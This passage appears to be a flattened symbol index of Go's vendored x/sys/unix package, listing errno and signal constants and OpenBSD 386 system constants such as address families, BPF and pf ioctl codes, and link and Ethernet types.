ELOOP (line 1526) | ELOOP = syscall.Errno(0x3e) constant EMFILE (line 1527) | EMFILE = syscall.Errno(0x18) constant EMLINK (line 1528) | EMLINK = syscall.Errno(0x1f) constant EMSGSIZE (line 1529) | EMSGSIZE = syscall.Errno(0x28) constant EMULTIHOP (line 1530) | EMULTIHOP = syscall.Errno(0x5e) constant ENAMETOOLONG (line 1531) | ENAMETOOLONG = syscall.Errno(0x3f) constant ENEEDAUTH (line 1532) | ENEEDAUTH = syscall.Errno(0x51) constant ENETDOWN (line 1533) | ENETDOWN = syscall.Errno(0x32) constant ENETRESET (line 1534) | ENETRESET = syscall.Errno(0x34) constant ENETUNREACH (line 1535) | ENETUNREACH = syscall.Errno(0x33) constant ENFILE (line 1536) | ENFILE = syscall.Errno(0x17) constant ENOATTR (line 1537) | ENOATTR = syscall.Errno(0x5d) constant ENOBUFS (line 1538) | ENOBUFS = syscall.Errno(0x37) constant ENODATA (line 1539) | ENODATA = syscall.Errno(0x59) constant ENODEV (line 1540) | ENODEV = syscall.Errno(0x13) constant ENOENT (line 1541) | ENOENT = syscall.Errno(0x2) constant ENOEXEC (line 1542) | ENOEXEC = syscall.Errno(0x8) constant ENOLCK (line 1543) | ENOLCK = syscall.Errno(0x4d) constant ENOLINK (line 1544) | ENOLINK = syscall.Errno(0x5f) constant ENOMEM (line 1545) | ENOMEM = syscall.Errno(0xc) constant ENOMSG (line 1546) | ENOMSG = syscall.Errno(0x53) constant ENOPROTOOPT (line 1547) | ENOPROTOOPT = syscall.Errno(0x2a) constant ENOSPC (line 1548) | ENOSPC = syscall.Errno(0x1c) constant ENOSR (line 1549) | ENOSR = syscall.Errno(0x5a) constant ENOSTR (line 1550) | ENOSTR = syscall.Errno(0x5b) constant ENOSYS (line 1551) | ENOSYS = syscall.Errno(0x4e) constant ENOTBLK (line 1552) | ENOTBLK = syscall.Errno(0xf) constant ENOTCONN (line 1553) | ENOTCONN = syscall.Errno(0x39) constant ENOTDIR (line 1554) | ENOTDIR = syscall.Errno(0x14) constant ENOTEMPTY (line 1555) | ENOTEMPTY = syscall.Errno(0x42) constant ENOTSOCK (line 1556) | ENOTSOCK = syscall.Errno(0x26) constant ENOTSUP (line 1557) | ENOTSUP = syscall.Errno(0x56) constant ENOTTY (line 1558) | ENOTTY = syscall.Errno(0x19) constant ENXIO (line 1559) | ENXIO = syscall.Errno(0x6) constant EOPNOTSUPP (line 1560) | EOPNOTSUPP = syscall.Errno(0x2d) constant EOVERFLOW (line 1561) | EOVERFLOW = syscall.Errno(0x54) constant EPERM (line 1562) | EPERM = syscall.Errno(0x1) constant EPFNOSUPPORT (line 1563) | EPFNOSUPPORT = syscall.Errno(0x2e) constant EPIPE (line 1564) | EPIPE = syscall.Errno(0x20) constant EPROCLIM (line 1565) | EPROCLIM = syscall.Errno(0x43) constant EPROCUNAVAIL (line 1566) | EPROCUNAVAIL = syscall.Errno(0x4c) constant EPROGMISMATCH (line 1567) | EPROGMISMATCH = syscall.Errno(0x4b) constant EPROGUNAVAIL (line 1568) | EPROGUNAVAIL = syscall.Errno(0x4a) constant EPROTO (line 1569) | EPROTO = syscall.Errno(0x60) constant EPROTONOSUPPORT (line 1570) | EPROTONOSUPPORT = syscall.Errno(0x2b) constant EPROTOTYPE (line 1571) | EPROTOTYPE = syscall.Errno(0x29) constant ERANGE (line 1572) | ERANGE = syscall.Errno(0x22) constant EREMOTE (line 1573) | EREMOTE = syscall.Errno(0x47) constant EROFS (line 1574) | EROFS = syscall.Errno(0x1e) constant ERPCMISMATCH (line 1575) | ERPCMISMATCH = syscall.Errno(0x49) constant ESHUTDOWN (line 1576) | ESHUTDOWN = syscall.Errno(0x3a) constant ESOCKTNOSUPPORT (line 1577) | ESOCKTNOSUPPORT = syscall.Errno(0x2c) constant ESPIPE (line 1578) | ESPIPE = syscall.Errno(0x1d) constant ESRCH (line 1579) | ESRCH = syscall.Errno(0x3) constant ESTALE (line 1580) | ESTALE = syscall.Errno(0x46) constant ETIME (line 1581) | ETIME = syscall.Errno(0x5c) constant ETIMEDOUT (line 1582) | ETIMEDOUT = syscall.Errno(0x3c) constant ETOOMANYREFS (line 1583) | ETOOMANYREFS = syscall.Errno(0x3b) constant ETXTBSY (line 1584) | ETXTBSY = syscall.Errno(0x1a) constant EUSERS (line 1585) | EUSERS = syscall.Errno(0x44) constant EWOULDBLOCK (line 1586) | EWOULDBLOCK = syscall.Errno(0x23) constant EXDEV (line 1587) | EXDEV = syscall.Errno(0x12) constant SIGABRT (line 1592) | SIGABRT = syscall.Signal(0x6) constant SIGALRM (line 1593) | SIGALRM = syscall.Signal(0xe) constant SIGBUS (line 1594) | SIGBUS = syscall.Signal(0xa) constant SIGCHLD (line 1595) | SIGCHLD = syscall.Signal(0x14) constant SIGCONT (line 1596) | SIGCONT = syscall.Signal(0x13) constant SIGEMT (line 1597) | SIGEMT = syscall.Signal(0x7) constant SIGFPE (line 1598) | SIGFPE = syscall.Signal(0x8) constant SIGHUP (line 1599) | SIGHUP = syscall.Signal(0x1) constant SIGILL (line 1600) | SIGILL = syscall.Signal(0x4) constant SIGINFO (line 1601) | SIGINFO = syscall.Signal(0x1d) constant SIGINT (line 1602) | SIGINT = syscall.Signal(0x2) constant SIGIO (line 1603) | SIGIO = syscall.Signal(0x17) constant SIGIOT (line 1604) | SIGIOT = syscall.Signal(0x6) constant SIGKILL (line 1605) | SIGKILL = syscall.Signal(0x9) constant SIGPIPE (line 1606) | SIGPIPE = syscall.Signal(0xd) constant SIGPROF (line 1607) | SIGPROF = syscall.Signal(0x1b) constant SIGPWR (line 1608) | SIGPWR = syscall.Signal(0x20) constant SIGQUIT (line 1609) | SIGQUIT = syscall.Signal(0x3) constant SIGSEGV (line 1610) | SIGSEGV = syscall.Signal(0xb) constant SIGSTOP (line 1611) | SIGSTOP = syscall.Signal(0x11) constant SIGSYS (line 1612) | SIGSYS = syscall.Signal(0xc) constant SIGTERM (line 1613) | SIGTERM = syscall.Signal(0xf) constant SIGTRAP (line 1614) | SIGTRAP = syscall.Signal(0x5) constant SIGTSTP (line 1615) | SIGTSTP = syscall.Signal(0x12) constant SIGTTIN (line 1616) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 1617) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 1618) | SIGURG = syscall.Signal(0x10) constant SIGUSR1 (line 1619) | SIGUSR1 = syscall.Signal(0x1e) constant SIGUSR2 (line 1620) | SIGUSR2 = syscall.Signal(0x1f) constant SIGVTALRM (line 1621) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 1622) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 1623) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 1624) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_openbsd_386.go constant AF_APPLETALK (line 14) | AF_APPLETALK = 0x10 constant AF_BLUETOOTH (line 15) | AF_BLUETOOTH = 0x20 constant AF_CCITT (line 16) | AF_CCITT = 0xa constant AF_CHAOS (line 17) | AF_CHAOS = 0x5 constant AF_CNT (line 18) | AF_CNT = 0x15 constant AF_COIP (line 19) | AF_COIP = 0x14 constant AF_DATAKIT (line 20) | AF_DATAKIT = 0x9 constant AF_DECnet (line 21) | AF_DECnet = 0xc constant AF_DLI (line 22) | AF_DLI = 0xd constant AF_E164 (line 23) | AF_E164 = 0x1a constant AF_ECMA (line 24) | AF_ECMA = 0x8 constant AF_ENCAP (line 25) | AF_ENCAP = 0x1c constant AF_HYLINK (line 26) | AF_HYLINK = 0xf constant AF_IMPLINK (line 27) | AF_IMPLINK = 0x3 constant AF_INET (line 28) | AF_INET = 0x2 constant AF_INET6 (line 29) | AF_INET6 = 0x18 constant AF_IPX (line 30) | AF_IPX = 0x17 constant AF_ISDN (line 31) | AF_ISDN = 0x1a constant AF_ISO (line 32) | AF_ISO = 0x7 constant AF_KEY (line 33) | AF_KEY = 0x1e constant AF_LAT (line 34) | AF_LAT = 0xe constant AF_LINK (line 35) | AF_LINK = 0x12 constant AF_LOCAL (line 36) | AF_LOCAL = 0x1 constant AF_MAX (line 37) | AF_MAX = 0x24 constant AF_MPLS (line 38) | AF_MPLS = 0x21 constant AF_NATM (line 39) | AF_NATM = 0x1b constant AF_NS (line 40) | AF_NS = 0x6 constant AF_OSI (line 41) | AF_OSI = 0x7 constant AF_PUP (line 42) | AF_PUP = 0x4 constant AF_ROUTE (line 43) | AF_ROUTE = 0x11 constant AF_SIP (line 44) | AF_SIP = 0x1d constant AF_SNA (line 45) | AF_SNA = 0xb constant AF_UNIX (line 46) | AF_UNIX = 0x1 constant AF_UNSPEC (line 47) | AF_UNSPEC = 0x0 constant ALTWERASE (line 48) | ALTWERASE = 0x200 constant ARPHRD_ETHER (line 49) | ARPHRD_ETHER = 0x1 constant ARPHRD_FRELAY (line 50) | ARPHRD_FRELAY = 0xf constant ARPHRD_IEEE1394 (line 51) | ARPHRD_IEEE1394 = 0x18 constant ARPHRD_IEEE802 (line 52) | ARPHRD_IEEE802 = 0x6 constant B0 (line 53) | B0 = 0x0 constant B110 (line 54) | B110 = 0x6e constant B115200 (line 55) | B115200 = 0x1c200 constant B1200 (line 56) | B1200 = 0x4b0 constant B134 (line 57) | B134 = 0x86 constant B14400 (line 58) | B14400 = 0x3840 constant B150 (line 59) | B150 = 0x96 constant B1800 (line 60) | B1800 = 0x708 constant B19200 (line 61) | B19200 = 0x4b00 constant B200 (line 62) | B200 = 0xc8 constant B230400 (line 63) | B230400 = 0x38400 constant B2400 (line 64) | B2400 = 0x960 constant B28800 (line 65) | B28800 = 0x7080 constant B300 (line 66) | B300 = 0x12c constant B38400 (line 67) | B38400 = 0x9600 constant B4800 (line 68) | B4800 = 0x12c0 constant B50 (line 69) | B50 = 0x32 constant B57600 (line 70) | B57600 = 0xe100 constant B600 (line 71) | B600 = 0x258 constant B7200 (line 72) | B7200 = 0x1c20 constant B75 (line 73) | B75 = 0x4b constant B76800 (line 74) | B76800 = 0x12c00 constant B9600 (line 75) | B9600 = 0x2580 constant BIOCFLUSH (line 76) | BIOCFLUSH = 0x20004268 constant BIOCGBLEN (line 77) | BIOCGBLEN = 0x40044266 constant BIOCGDIRFILT (line 78) | BIOCGDIRFILT = 0x4004427c constant BIOCGDLT (line 79) | BIOCGDLT = 0x4004426a constant BIOCGDLTLIST (line 80) | BIOCGDLTLIST = 0xc008427b constant BIOCGETIF (line 81) | BIOCGETIF = 0x4020426b constant BIOCGFILDROP (line 82) | BIOCGFILDROP = 0x40044278 constant BIOCGHDRCMPLT (line 83) | BIOCGHDRCMPLT = 0x40044274 constant BIOCGRSIG (line 84) | BIOCGRSIG = 0x40044273 constant BIOCGRTIMEOUT (line 85) | BIOCGRTIMEOUT = 0x400c426e constant BIOCGSTATS (line 86) | BIOCGSTATS = 0x4008426f constant BIOCIMMEDIATE (line 87) | BIOCIMMEDIATE = 0x80044270 constant BIOCLOCK (line 88) | BIOCLOCK = 0x20004276 constant BIOCPROMISC (line 89) | BIOCPROMISC = 0x20004269 constant BIOCSBLEN (line 90) | BIOCSBLEN = 0xc0044266 constant BIOCSDIRFILT (line 91) | BIOCSDIRFILT = 0x8004427d constant BIOCSDLT (line 92) | BIOCSDLT = 0x8004427a constant BIOCSETF (line 93) | BIOCSETF = 0x80084267 constant BIOCSETIF (line 94) | BIOCSETIF = 0x8020426c constant BIOCSETWF (line 95) | BIOCSETWF = 0x80084277 constant BIOCSFILDROP (line 96) | BIOCSFILDROP = 0x80044279 constant BIOCSHDRCMPLT (line 97) | BIOCSHDRCMPLT = 0x80044275 constant BIOCSRSIG (line 98) | BIOCSRSIG = 0x80044272 constant BIOCSRTIMEOUT (line 99) | BIOCSRTIMEOUT = 0x800c426d constant BIOCVERSION (line 100) | BIOCVERSION = 0x40044271 constant BPF_A (line 101) | BPF_A = 0x10 constant BPF_ABS (line 102) | BPF_ABS = 0x20 constant BPF_ADD (line 103) | BPF_ADD = 0x0 constant BPF_ALIGNMENT (line 104) | BPF_ALIGNMENT = 0x4 constant BPF_ALU (line 105) | BPF_ALU = 0x4 constant BPF_AND (line 106) | BPF_AND = 0x50 constant BPF_B (line 107) | BPF_B = 0x10 constant BPF_DIRECTION_IN (line 108) | BPF_DIRECTION_IN = 0x1 constant BPF_DIRECTION_OUT (line 109) | BPF_DIRECTION_OUT = 0x2 constant BPF_DIV (line 110) | BPF_DIV = 0x30 constant BPF_FILDROP_CAPTURE (line 111) | BPF_FILDROP_CAPTURE = 0x1 constant BPF_FILDROP_DROP (line 112) | BPF_FILDROP_DROP = 0x2 constant BPF_FILDROP_PASS (line 113) | BPF_FILDROP_PASS = 0x0 constant BPF_F_DIR_IN (line 114) | BPF_F_DIR_IN = 0x10 constant BPF_F_DIR_MASK (line 115) | BPF_F_DIR_MASK = 0x30 constant BPF_F_DIR_OUT (line 116) | BPF_F_DIR_OUT = 0x20 constant BPF_F_DIR_SHIFT (line 117) | BPF_F_DIR_SHIFT = 0x4 constant BPF_F_FLOWID (line 118) | BPF_F_FLOWID = 0x8 constant BPF_F_PRI_MASK (line 119) | BPF_F_PRI_MASK = 0x7 constant BPF_H (line 120) | BPF_H = 0x8 constant BPF_IMM (line 121) | BPF_IMM = 0x0 constant BPF_IND (line 122) | BPF_IND = 0x40 constant BPF_JA (line 123) | BPF_JA = 0x0 constant BPF_JEQ (line 124) | BPF_JEQ = 0x10 constant BPF_JGE (line 125) | BPF_JGE = 0x30 constant BPF_JGT (line 126) | BPF_JGT = 0x20 constant BPF_JMP (line 127) | BPF_JMP = 0x5 constant BPF_JSET (line 128) | BPF_JSET = 0x40 constant BPF_K (line 129) | BPF_K = 0x0 constant BPF_LD (line 130) | BPF_LD = 0x0 constant BPF_LDX (line 131) | BPF_LDX = 0x1 constant BPF_LEN (line 132) | BPF_LEN = 0x80 constant BPF_LSH (line 133) | BPF_LSH = 0x60 constant BPF_MAJOR_VERSION (line 134) | BPF_MAJOR_VERSION = 0x1 constant BPF_MAXBUFSIZE (line 135) | BPF_MAXBUFSIZE = 0x200000 constant BPF_MAXINSNS (line 136) | BPF_MAXINSNS = 0x200 constant BPF_MEM (line 137) | BPF_MEM = 0x60 constant BPF_MEMWORDS (line 138) | BPF_MEMWORDS = 0x10 constant BPF_MINBUFSIZE (line 139) | BPF_MINBUFSIZE = 0x20 constant BPF_MINOR_VERSION (line 140) | BPF_MINOR_VERSION = 0x1 constant BPF_MISC (line 141) | BPF_MISC = 0x7 constant BPF_MSH (line 142) | BPF_MSH = 0xa0 constant BPF_MUL (line 143) | BPF_MUL = 0x20 constant BPF_NEG (line 144) | BPF_NEG = 0x80 constant BPF_OR (line 145) | BPF_OR = 0x40 constant BPF_RELEASE (line 146) | BPF_RELEASE = 0x30bb6 constant BPF_RET (line 147) | BPF_RET = 0x6 constant BPF_RND (line 148) | BPF_RND = 0xc0 constant BPF_RSH (line 149) | BPF_RSH = 0x70 constant BPF_ST (line 150) | BPF_ST = 0x2 constant BPF_STX (line 151) | BPF_STX = 0x3 constant BPF_SUB (line 152) | BPF_SUB = 0x10 constant BPF_TAX (line 153) | BPF_TAX = 0x0 constant BPF_TXA (line 154) | BPF_TXA = 0x80 constant BPF_W (line 155) | BPF_W = 0x0 constant BPF_X (line 156) | BPF_X = 0x8 constant BRKINT (line 157) | BRKINT = 0x2 constant CFLUSH (line 158) | CFLUSH = 0xf constant CLOCAL (line 159) | CLOCAL = 0x8000 constant CLOCK_BOOTTIME (line 160) | CLOCK_BOOTTIME = 0x6 constant CLOCK_MONOTONIC (line 161) | CLOCK_MONOTONIC = 0x3 constant CLOCK_PROCESS_CPUTIME_ID (line 162) | CLOCK_PROCESS_CPUTIME_ID = 0x2 constant CLOCK_REALTIME (line 163) | CLOCK_REALTIME = 0x0 constant CLOCK_THREAD_CPUTIME_ID (line 164) | CLOCK_THREAD_CPUTIME_ID = 0x4 constant CLOCK_UPTIME (line 165) | CLOCK_UPTIME = 0x5 constant CPUSTATES (line 166) | CPUSTATES = 0x6 constant CP_IDLE (line 167) | CP_IDLE = 0x5 constant CP_INTR (line 168) | CP_INTR = 0x4 constant CP_NICE (line 169) | CP_NICE = 0x1 constant CP_SPIN (line 170) | CP_SPIN = 0x3 constant CP_SYS (line 171) | CP_SYS = 0x2 constant CP_USER (line 172) | CP_USER = 0x0 constant CREAD (line 173) | CREAD = 0x800 constant CRTSCTS (line 174) | CRTSCTS = 0x10000 constant CS5 (line 175) | CS5 = 0x0 constant CS6 (line 176) | CS6 = 0x100 constant CS7 (line 177) | CS7 = 0x200 constant CS8 (line 178) | CS8 = 0x300 constant CSIZE (line 179) | CSIZE = 0x300 constant CSTART (line 180) | CSTART = 0x11 constant CSTATUS (line 181) | CSTATUS = 0xff constant CSTOP (line 182) | CSTOP = 0x13 constant CSTOPB (line 183) | CSTOPB = 0x400 constant CSUSP (line 184) | CSUSP = 0x1a constant CTL_HW (line 185) | CTL_HW = 0x6 constant CTL_KERN (line 186) | CTL_KERN = 0x1 constant CTL_MAXNAME (line 187) | CTL_MAXNAME = 0xc constant CTL_NET (line 188) | CTL_NET = 0x4 constant DIOCADDQUEUE (line 189) | DIOCADDQUEUE = 0xc100445d constant DIOCADDRULE (line 190) | DIOCADDRULE = 0xccc84404 constant DIOCADDSTATE (line 191) | DIOCADDSTATE = 0xc1084425 constant DIOCCHANGERULE (line 192) | DIOCCHANGERULE = 0xccc8441a constant DIOCCLRIFFLAG (line 193) | DIOCCLRIFFLAG = 0xc024445a constant DIOCCLRSRCNODES (line 194) | DIOCCLRSRCNODES = 0x20004455 constant DIOCCLRSTATES (line 195) | DIOCCLRSTATES = 0xc0d04412 constant DIOCCLRSTATUS (line 196) | DIOCCLRSTATUS = 0xc0244416 constant DIOCGETLIMIT (line 197) | DIOCGETLIMIT = 0xc0084427 constant DIOCGETQSTATS (line 198) | DIOCGETQSTATS = 0xc1084460 constant DIOCGETQUEUE (line 199) | DIOCGETQUEUE = 0xc100445f constant DIOCGETQUEUES (line 200) | DIOCGETQUEUES = 0xc100445e constant DIOCGETRULE (line 201) | DIOCGETRULE = 0xccc84407 constant DIOCGETRULES (line 202) | DIOCGETRULES = 0xccc84406 constant DIOCGETRULESET (line 203) | DIOCGETRULESET = 0xc444443b constant DIOCGETRULESETS (line 204) | DIOCGETRULESETS = 0xc444443a constant DIOCGETSRCNODES (line 205) | DIOCGETSRCNODES = 0xc0084454 constant DIOCGETSTATE (line 206) | DIOCGETSTATE = 0xc1084413 constant DIOCGETSTATES (line 207) | DIOCGETSTATES = 0xc0084419 constant DIOCGETSTATUS (line 208) | DIOCGETSTATUS = 0xc1e84415 constant DIOCGETSYNFLWATS (line 209) | DIOCGETSYNFLWATS = 0xc0084463 constant DIOCGETTIMEOUT (line 210) | DIOCGETTIMEOUT = 0xc008441e constant DIOCIGETIFACES (line 211) | DIOCIGETIFACES = 0xc0244457 constant DIOCKILLSRCNODES (line 212) | DIOCKILLSRCNODES = 0xc068445b constant DIOCKILLSTATES (line 213) | DIOCKILLSTATES = 0xc0d04429 constant DIOCNATLOOK (line 214) | DIOCNATLOOK = 0xc0504417 constant DIOCOSFPADD (line 215) | DIOCOSFPADD = 0xc084444f constant DIOCOSFPFLUSH (line 216) | DIOCOSFPFLUSH = 0x2000444e constant DIOCOSFPGET (line 217) | DIOCOSFPGET = 0xc0844450 constant DIOCRADDADDRS (line 218) | DIOCRADDADDRS = 0xc44c4443 constant DIOCRADDTABLES (line 219) | DIOCRADDTABLES = 0xc44c443d constant DIOCRCLRADDRS (line 220) | DIOCRCLRADDRS = 0xc44c4442 constant DIOCRCLRASTATS (line 221) | DIOCRCLRASTATS = 0xc44c4448 constant DIOCRCLRTABLES (line 222) | DIOCRCLRTABLES = 0xc44c443c constant DIOCRCLRTSTATS (line 223) | DIOCRCLRTSTATS = 0xc44c4441 constant DIOCRDELADDRS (line 224) | DIOCRDELADDRS = 0xc44c4444 constant DIOCRDELTABLES (line 225) | DIOCRDELTABLES = 0xc44c443e constant DIOCRGETADDRS (line 226) | DIOCRGETADDRS = 0xc44c4446 constant DIOCRGETASTATS (line 227) | DIOCRGETASTATS = 0xc44c4447 constant DIOCRGETTABLES (line 228) | DIOCRGETTABLES = 0xc44c443f constant DIOCRGETTSTATS (line 229) | DIOCRGETTSTATS = 0xc44c4440 constant DIOCRINADEFINE (line 230) | DIOCRINADEFINE = 0xc44c444d constant DIOCRSETADDRS (line 231) | DIOCRSETADDRS = 0xc44c4445 constant DIOCRSETTFLAGS (line 232) | DIOCRSETTFLAGS = 0xc44c444a constant DIOCRTSTADDRS (line 233) | DIOCRTSTADDRS = 0xc44c4449 constant DIOCSETDEBUG (line 234) | DIOCSETDEBUG = 0xc0044418 constant DIOCSETHOSTID (line 235) | DIOCSETHOSTID = 0xc0044456 constant DIOCSETIFFLAG (line 236) | DIOCSETIFFLAG = 0xc0244459 constant DIOCSETLIMIT (line 237) | DIOCSETLIMIT = 0xc0084428 constant DIOCSETREASS (line 238) | DIOCSETREASS = 0xc004445c constant DIOCSETSTATUSIF (line 239) | DIOCSETSTATUSIF = 0xc0244414 constant DIOCSETSYNCOOKIES (line 240) | DIOCSETSYNCOOKIES = 0xc0014462 constant DIOCSETSYNFLWATS (line 241) | DIOCSETSYNFLWATS = 0xc0084461 constant DIOCSETTIMEOUT (line 242) | DIOCSETTIMEOUT = 0xc008441d constant DIOCSTART (line 243) | DIOCSTART = 0x20004401 constant DIOCSTOP (line 244) | DIOCSTOP = 0x20004402 constant DIOCXBEGIN (line 245) | DIOCXBEGIN = 0xc00c4451 constant DIOCXCOMMIT (line 246) | DIOCXCOMMIT = 0xc00c4452 constant DIOCXROLLBACK (line 247) | DIOCXROLLBACK = 0xc00c4453 constant DLT_ARCNET (line 248) | DLT_ARCNET = 0x7 constant DLT_ATM_RFC1483 (line 249) | DLT_ATM_RFC1483 = 0xb constant DLT_AX25 (line 250) | DLT_AX25 = 0x3 constant DLT_CHAOS (line 251) | DLT_CHAOS = 0x5 constant DLT_C_HDLC (line 252) | DLT_C_HDLC = 0x68 constant DLT_EN10MB (line 253) | DLT_EN10MB = 0x1 constant DLT_EN3MB (line 254) | DLT_EN3MB = 0x2 constant DLT_ENC (line 255) | DLT_ENC = 0xd constant DLT_FDDI (line 256) | DLT_FDDI = 0xa constant DLT_IEEE802 (line 257) | DLT_IEEE802 = 0x6 constant DLT_IEEE802_11 (line 258) | DLT_IEEE802_11 = 0x69 constant DLT_IEEE802_11_RADIO (line 259) | DLT_IEEE802_11_RADIO = 0x7f constant DLT_LOOP (line 260) | DLT_LOOP = 0xc constant DLT_MPLS (line 261) | DLT_MPLS = 0xdb constant DLT_NULL (line 262) | DLT_NULL = 0x0 constant DLT_OPENFLOW (line 263) | DLT_OPENFLOW = 0x10b constant DLT_PFLOG (line 264) | DLT_PFLOG = 0x75 constant DLT_PFSYNC (line 265) | DLT_PFSYNC = 0x12 constant DLT_PPP (line 266) | DLT_PPP = 0x9 constant DLT_PPP_BSDOS (line 267) | DLT_PPP_BSDOS = 0x10 constant DLT_PPP_ETHER (line 268) | DLT_PPP_ETHER = 0x33 constant DLT_PPP_SERIAL (line 269) | DLT_PPP_SERIAL = 0x32 constant DLT_PRONET (line 270) | DLT_PRONET = 0x4 constant DLT_RAW (line 271) | DLT_RAW = 0xe constant DLT_SLIP (line 272) | DLT_SLIP = 0x8 constant DLT_SLIP_BSDOS (line 273) | DLT_SLIP_BSDOS = 0xf constant DLT_USBPCAP (line 274) | DLT_USBPCAP = 0xf9 constant DLT_USER0 (line 275) | DLT_USER0 = 0x93 constant DLT_USER1 (line 276) | DLT_USER1 = 0x94 constant DLT_USER10 (line 277) | DLT_USER10 = 0x9d constant DLT_USER11 (line 278) | DLT_USER11 = 0x9e constant DLT_USER12 (line 279) | DLT_USER12 = 0x9f constant DLT_USER13 (line 280) | DLT_USER13 = 0xa0 constant DLT_USER14 (line 281) | DLT_USER14 = 0xa1 constant DLT_USER15 (line 282) | DLT_USER15 = 0xa2 constant DLT_USER2 (line 283) | DLT_USER2 = 0x95 constant DLT_USER3 (line 284) | DLT_USER3 = 0x96 constant DLT_USER4 (line 285) | DLT_USER4 = 0x97 constant DLT_USER5 (line 286) | DLT_USER5 = 0x98 constant DLT_USER6 (line 287) | DLT_USER6 = 0x99 constant DLT_USER7 (line 288) | DLT_USER7 = 0x9a constant DLT_USER8 (line 289) | DLT_USER8 = 0x9b constant DLT_USER9 (line 290) | DLT_USER9 = 0x9c constant DT_BLK (line 291) | DT_BLK = 0x6 constant DT_CHR (line 292) | DT_CHR = 0x2 constant DT_DIR (line 293) | DT_DIR = 0x4 constant DT_FIFO (line 294) | DT_FIFO = 0x1 constant DT_LNK (line 295) | DT_LNK = 0xa constant DT_REG (line 296) | DT_REG = 0x8 constant DT_SOCK (line 297) | DT_SOCK = 0xc constant DT_UNKNOWN (line 298) | DT_UNKNOWN = 0x0 constant ECHO (line 299) | ECHO = 0x8 constant ECHOCTL (line 300) | ECHOCTL = 0x40 constant ECHOE (line 301) | ECHOE = 0x2 constant ECHOK (line 302) | ECHOK = 0x4 constant ECHOKE (line 303) | ECHOKE = 0x1 constant ECHONL (line 304) | ECHONL = 0x10 constant ECHOPRT (line 305) | ECHOPRT = 0x20 constant EMT_TAGOVF (line 306) | EMT_TAGOVF = 0x1 constant EMUL_ENABLED (line 307) | EMUL_ENABLED = 0x1 constant EMUL_NATIVE (line 308) | EMUL_NATIVE = 0x2 constant ENDRUNDISC (line 309) | ENDRUNDISC = 0x9 constant ETH64_8021_RSVD_MASK (line 310) | ETH64_8021_RSVD_MASK = 0xfffffffffff0 constant ETH64_8021_RSVD_PREFIX (line 311) | ETH64_8021_RSVD_PREFIX = 0x180c2000000 constant ETHERMIN (line 312) | ETHERMIN = 0x2e constant ETHERMTU (line 313) | ETHERMTU = 0x5dc constant ETHERTYPE_8023 (line 314) | ETHERTYPE_8023 = 0x4 constant ETHERTYPE_AARP (line 315) | ETHERTYPE_AARP = 0x80f3 constant ETHERTYPE_ACCTON (line 316) | ETHERTYPE_ACCTON = 0x8390 constant ETHERTYPE_AEONIC (line 317) | ETHERTYPE_AEONIC = 0x8036 constant ETHERTYPE_ALPHA (line 318) | ETHERTYPE_ALPHA = 0x814a constant ETHERTYPE_AMBER (line 319) | ETHERTYPE_AMBER = 0x6008 constant ETHERTYPE_AMOEBA (line 320) | ETHERTYPE_AMOEBA = 0x8145 constant ETHERTYPE_AOE (line 321) | ETHERTYPE_AOE = 0x88a2 constant ETHERTYPE_APOLLO (line 322) | ETHERTYPE_APOLLO = 0x80f7 constant ETHERTYPE_APOLLODOMAIN (line 323) | ETHERTYPE_APOLLODOMAIN = 0x8019 constant ETHERTYPE_APPLETALK (line 324) | ETHERTYPE_APPLETALK = 0x809b constant ETHERTYPE_APPLITEK (line 325) | ETHERTYPE_APPLITEK = 0x80c7 constant ETHERTYPE_ARGONAUT (line 326) | ETHERTYPE_ARGONAUT = 0x803a constant ETHERTYPE_ARP (line 327) | ETHERTYPE_ARP = 0x806 constant ETHERTYPE_AT (line 328) | ETHERTYPE_AT = 0x809b constant ETHERTYPE_ATALK (line 329) | ETHERTYPE_ATALK = 0x809b constant ETHERTYPE_ATOMIC (line 330) | ETHERTYPE_ATOMIC = 0x86df constant ETHERTYPE_ATT (line 331) | ETHERTYPE_ATT = 0x8069 constant ETHERTYPE_ATTSTANFORD (line 332) | ETHERTYPE_ATTSTANFORD = 0x8008 constant ETHERTYPE_AUTOPHON (line 333) | ETHERTYPE_AUTOPHON = 0x806a constant ETHERTYPE_AXIS (line 334) | ETHERTYPE_AXIS = 0x8856 constant ETHERTYPE_BCLOOP (line 335) | ETHERTYPE_BCLOOP = 0x9003 constant ETHERTYPE_BOFL (line 336) | ETHERTYPE_BOFL = 0x8102 constant ETHERTYPE_CABLETRON (line 337) | ETHERTYPE_CABLETRON = 0x7034 constant ETHERTYPE_CHAOS (line 338) | ETHERTYPE_CHAOS = 0x804 constant ETHERTYPE_COMDESIGN (line 339) | ETHERTYPE_COMDESIGN = 0x806c constant ETHERTYPE_COMPUGRAPHIC (line 340) | ETHERTYPE_COMPUGRAPHIC = 0x806d constant ETHERTYPE_COUNTERPOINT (line 341) | ETHERTYPE_COUNTERPOINT = 0x8062 constant ETHERTYPE_CRONUS (line 342) | ETHERTYPE_CRONUS = 0x8004 constant ETHERTYPE_CRONUSVLN (line 343) | ETHERTYPE_CRONUSVLN = 0x8003 constant ETHERTYPE_DCA (line 344) | ETHERTYPE_DCA = 0x1234 constant ETHERTYPE_DDE (line 345) | ETHERTYPE_DDE = 0x807b constant ETHERTYPE_DEBNI (line 346) | ETHERTYPE_DEBNI = 0xaaaa constant ETHERTYPE_DECAM (line 347) | ETHERTYPE_DECAM = 0x8048 constant ETHERTYPE_DECCUST (line 348) | ETHERTYPE_DECCUST = 0x6006 constant ETHERTYPE_DECDIAG (line 349) | ETHERTYPE_DECDIAG = 0x6005 constant ETHERTYPE_DECDNS (line 350) | ETHERTYPE_DECDNS = 0x803c constant ETHERTYPE_DECDTS (line 351) | ETHERTYPE_DECDTS = 0x803e constant ETHERTYPE_DECEXPER (line 352) | ETHERTYPE_DECEXPER = 0x6000 constant ETHERTYPE_DECLAST (line 353) | ETHERTYPE_DECLAST = 0x8041 constant ETHERTYPE_DECLTM (line 354) | ETHERTYPE_DECLTM = 0x803f constant ETHERTYPE_DECMUMPS (line 355) | ETHERTYPE_DECMUMPS = 0x6009 constant ETHERTYPE_DECNETBIOS (line 356) | ETHERTYPE_DECNETBIOS = 0x8040 constant ETHERTYPE_DELTACON (line 357) | ETHERTYPE_DELTACON = 0x86de constant ETHERTYPE_DIDDLE (line 